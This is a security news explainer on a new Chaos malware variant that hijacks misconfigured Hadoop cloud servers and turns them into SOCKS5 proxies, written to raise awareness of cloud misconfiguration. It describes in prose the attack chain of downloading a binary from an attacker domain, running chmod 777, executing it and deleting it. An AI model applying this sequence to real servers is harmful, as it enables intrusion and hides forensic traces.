New Chaos malware targets cloud

Cloud break-ins often start with something boring: a server left exposed, a port left open, or a service configured to trust the internet when it should trust only a private network. Security teams call that a cloud misconfiguration, and Aqua says it can be as simple as public access, exposed keys, or unrestricted ports. (aquasec.com) Chaos is malware, which means a small program an attacker drops onto a machine so it will obey remote commands later. Lumen’s Black Lotus Labs first documented Chaos in September 2022 as a cross-platform tool for Windows and Linux that could run shell commands, add new modules, mine cryptocurrency, and launch distributed denial-of-service attacks. (thehackernews.com) For most of its life, Chaos went after routers and edge devices, which are the internet-facing boxes that sit at the perimeter of a network like a front gate. Darktrace says the new variant seen in March 2026 shifted onto misconfigured Linux cloud servers, which puts it inside infrastructure companies actually use to run applications and data jobs. (helpnetsecurity.com) Researchers caught the new sample in a honeypot, which is a decoy system built to attract attackers the way a fake wallet can catch a pickpocket. Darktrace’s CloudyPots network exposed a deliberately misconfigured Apache Hadoop server, and the attackers used a web request to create a new application that ran shell commands on that machine. (helpnetsecurity.com) Those shell commands did four concrete things in order: download a Chaos binary from an attacker-controlled domain, change its permissions with `chmod 777`, execute it, and then delete the file from disk. Deleting the file after launch cuts down the forensic trail, which makes incident response harder after the server is already compromised. (thehackernews.com) The code itself also changed. Help Net Security reports that this 64-bit Linux sample dropped older features for spreading through Secure Shell brute force and exploiting router bugs, and replaced them with a SOCKS5 proxy, which is a relay that lets someone send traffic through another machine the way a getaway driver lets a robber leave in someone else’s car. (helpnetsecurity.com) That proxy feature gives attackers two useful tricks at once. Darktrace says they can make malicious traffic appear to come from the victim’s internet address, and they can also pivot into internal systems that are reachable only from inside that cloud environment. (helpnetsecurity.com) This is why cloud malware looks different from laptop malware. SentinelOne notes that cloud intrusions often start with exposed web apps, exposed Jenkins servers, or leaked service credentials, because attackers care less about tricking one employee and more about finding one misconfigured service that gives them automation and scale. (sentinelone.com) The result is that a plain setup mistake now does more than invite cryptomining or a denial-of-service bot. With Chaos acting as a proxy on a cloud server, one exposed service can become a hidden launchpad for later attacks, with the victim’s own infrastructure masking where the traffic really started. (thehackernews.com)